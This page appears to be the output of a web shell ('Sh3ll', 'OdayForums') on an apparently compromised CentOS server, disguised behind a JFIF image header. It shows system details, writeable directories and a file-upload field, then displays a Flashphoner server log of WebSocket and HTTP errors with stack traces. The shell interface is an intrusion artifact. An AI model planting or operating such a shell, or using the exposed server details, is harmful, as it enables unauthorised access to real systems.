JFIF ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/cwd/usr/local/FlashphonerWebCallServer/logs/server_logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/cwd/usr/local/FlashphonerWebCallServer/logs/server_logs/flashphoner.log.2024-02-05-06
06:00:01,697 WARN       WSServerHandler - WS-pool-14-thread-45556 Close channel [id: 0x09042511, /35.216.238.224:41462 => /45.252.249.168:8080] because: java.lang.IllegalArgumentException 'empty text'
06:00:01,815 WARN       WSServerHandler - WS-pool-14-thread-45556 Close channel [id: 0x09042511, /35.216.238.224:41462 :> /45.252.249.168:8080] because: java.lang.IllegalArgumentException 'empty text'
06:00:01,818 INFO       WSServerHandler - WS-pool-14-thread-45556 Channel already closed, do nothing
06:00:02,365 INFO       WSServerHandler - WS-pool-14-thread-45556 Orgign: null
06:00:02,408 WARN       WSServerHandler - WS-pool-14-thread-45556 Close channel [id: 0x2a7663c1, /35.216.238.224:41472 => /45.252.249.168:8080] because: org.jboss.netty.handler.codec.http.websocketx.WebSocketHandshakeException 'not a WebSocket handshake request: missing upgrade'
06:00:02,408 WARN       WSServerHandler - WS-pool-14-thread-45556 Close channel [id: 0x2a7663c1, /35.216.238.224:41472 :> /45.252.249.168:8080] because: java.lang.IllegalArgumentException 'empty text'
06:00:02,408 INFO       WSServerHandler - WS-pool-14-thread-45556 Channel already closed, do nothing
06:00:02,409 WARN       WSServerHandler - WS-pool-14-thread-45556 Close channel [id: 0x2a7663c1, /35.216.238.224:41472 :> /45.252.249.168:8080] because: java.lang.IllegalArgumentException 'empty text'
06:00:02,409 INFO       WSServerHandler - WS-pool-14-thread-45556 Channel already closed, do nothing
06:08:38,410 INFO       WSServerHandler - WS-pool-14-thread-45557 Orgign: null
06:08:38,411 WARN       WSServerHandler - WS-pool-14-thread-45557 Close channel [id: 0x0746948c, /35.216.151.178:48304 => /45.252.249.168:8080] because: org.jboss.netty.handler.codec.http.websocketx.WebSocketHandshakeException 'not a WebSocket handshake request: missing upgrade'
06:21:16,102 ERROR    HttpServerHandler - HTTPS-pool-5-thread-783 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:21:16,111 ERROR    HttpServerHandler - HTTPS-pool-5-thread-783 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.channelDisconnected(Unknown Source)
	at org.jboss.netty.channel.Channels.fireChannelDisconnected(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.close(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.handleAcceptedSocket(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.eventSunk(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler$ClosingChannelFutureListener.operationComplete(Unknown Source)
	at org.jboss.netty.channel.DefaultChannelFuture.notifyListener(Unknown Source)
	at org.jboss.netty.channel.DefaultChannelFuture.addListener(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.closeOutboundAndChannel(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.handleDownstream(Unknown Source)
	at org.jboss.netty.handler.codec.oneone.OneToOneEncoder.handleDownstream(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleDownstream(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.channel.AbstractChannel.close(Unknown Source)
	at com.flashphoner.server.http.G.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleUpstream(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireExceptionCaught(Unknown Source)
	at org.jboss.netty.channel.AbstractChannelSink.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:21:16,118 ERROR    HttpServerHandler - HTTPS-pool-5-thread-783 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:21:21,791 ERROR    HttpServerHandler - HTTPS-pool-5-thread-66 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:21:21,792 ERROR    HttpServerHandler - HTTPS-pool-5-thread-66 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.channelDisconnected(Unknown Source)
	at org.jboss.netty.channel.Channels.fireChannelDisconnected(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.close(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.handleAcceptedSocket(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.eventSunk(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler$ClosingChannelFutureListener.operationComplete(Unknown Source)
	at org.jboss.netty.channel.DefaultChannelFuture.notifyListener(Unknown Source)
	at org.jboss.netty.channel.DefaultChannelFuture.addListener(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.closeOutboundAndChannel(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.handleDownstream(Unknown Source)
	at org.jboss.netty.handler.codec.oneone.OneToOneEncoder.handleDownstream(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleDownstream(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.channel.AbstractChannel.close(Unknown Source)
	at com.flashphoner.server.http.G.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleUpstream(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.ssl.SslHandler.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireExceptionCaught(Unknown Source)
	at org.jboss.netty.channel.AbstractChannelSink.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:21:21,793 ERROR    HttpServerHandler - HTTPS-pool-5-thread-66 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:27:02,189 ERROR    HttpServerHandler - HTTP-pool-3-thread-101 HTTP error
java.lang.IllegalArgumentException: invalid version format: <'%￲ネᅳᅡ쾌6￞ヘᅣヒ9 ̄ᄋ￀/￀+￀￀￀￀	￀￀
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:27:02,191 ERROR    HttpServerHandler - HTTP-pool-3-thread-101 HTTP error
java.lang.IllegalArgumentException: invalid version format: <'%￲ネᅳᅡ쾌6￞ヘᅣヒ9 ̄ᄋ￀/￀+￀￀￀￀	￀￀
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.channel.Channels.fireChannelDisconnected(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.close(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.handleAcceptedSocket(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.eventSunk(Unknown Source)
	at org.jboss.netty.handler.codec.oneone.OneToOneEncoder.handleDownstream(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleDownstream(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.channel.AbstractChannel.close(Unknown Source)
	at com.flashphoner.server.http.G.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleUpstream(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireExceptionCaught(Unknown Source)
	at org.jboss.netty.channel.AbstractChannelSink.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:27:23,523 ERROR    HttpServerHandler - HTTP-pool-3-thread-183 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:27:23,540 ERROR    HttpServerHandler - HTTP-pool-3-thread-183 HTTP error
java.lang.IllegalArgumentException: empty text
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.channel.Channels.fireChannelDisconnected(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.close(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.handleAcceptedSocket(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.eventSunk(Unknown Source)
	at org.jboss.netty.handler.codec.oneone.OneToOneEncoder.handleDownstream(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleDownstream(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.channel.AbstractChannel.close(Unknown Source)
	at com.flashphoner.server.http.G.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.stream.ChunkedWriteHandler.handleUpstream(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireExceptionCaught(Unknown Source)
	at org.jboss.netty.channel.AbstractChannelSink.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:39:22,933 ERROR     HLSServerHandler - HLS-HTTP-pool-22-thread-163 HTTP error
java.io.IOException: Connection reset by peer
	at sun.nio.ch.FileDispatcherImpl.read0(Native Method)
	at sun.nio.ch.SocketDispatcher.read(SocketDispatcher.java:39)
	at sun.nio.ch.IOUtil.readIntoNativeBuffer(IOUtil.java:223)
	at sun.nio.ch.IOUtil.read(IOUtil.java:192)
	at sun.nio.ch.SocketChannelImpl.read(SocketChannelImpl.java:377)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:39:23,207 ERROR     HLSServerHandler - HLS-HTTP-pool-22-thread-254 HTTP error
java.lang.IllegalArgumentException: invalid version format: G&ᅩ또ᄅ￀/￀0￀+￀,￀￀	￀￀
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:39:23,212 ERROR     HLSServerHandler - HLS-HTTP-pool-22-thread-254 HTTP error
java.lang.IllegalArgumentException: invalid version format: G&ᅩ또ᄅ￀/￀0￀+￀,￀￀	￀￀
	at org.jboss.netty.handler.codec.http.HttpVersion.<init>(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpVersion.valueOf(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpRequestDecoder.createMessage(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.http.HttpMessageDecoder.decode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(Unknown Source)
	at org.jboss.netty.handler.codec.replay.ReplayingDecoder.cleanup(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.channelDisconnected(Unknown Source)
	at org.jboss.netty.channel.Channels.fireChannelDisconnected(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.close(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.handleAcceptedSocket(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioServerSocketPipelineSink.eventSunk(Unknown Source)
	at org.jboss.netty.handler.codec.oneone.OneToOneEncoder.handleDownstream(Unknown Source)
	at org.jboss.netty.channel.Channels.close(Unknown Source)
	at org.jboss.netty.channel.AbstractChannel.close(Unknown Source)
	at com.flashphoner.server.H.B.exceptionCaught(Unknown Source)
	at org.jboss.netty.handler.codec.frame.FrameDecoder.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireExceptionCaught(Unknown Source)
	at org.jboss.netty.channel.AbstractChannelSink.exceptionCaught(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.Channels.fireMessageReceived(Unknown Source)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
06:39:26,774 ERROR     HLSServerHandler - HLS-HTTP-pool-22-thread-32 HTTP error
java.lang.ArrayIndexOutOfBoundsException
06:39:27,335 ERROR     HLSServerHandler - HLS-HTTP-pool-22-thread-308 HTTP error
java.io.IOException: Connection reset by peer
	at sun.nio.ch.FileDispatcherImpl.read0(Native Method)
	at sun.nio.ch.SocketDispatcher.read(SocketDispatcher.java:39)
	at sun.nio.ch.IOUtil.readIntoNativeBuffer(IOUtil.java:223)
	at sun.nio.ch.IOUtil.read(IOUtil.java:192)
	at sun.nio.ch.SocketChannelImpl.read(SocketChannelImpl.java:377)
	at org.jboss.netty.channel.socket.nio.NioWorker.read(Unknown Source)
	at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(Unknown Source)
	at org.jboss.netty.channel.socket.nio.DeadlockAwareNioWorker.run(Unknown Source)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
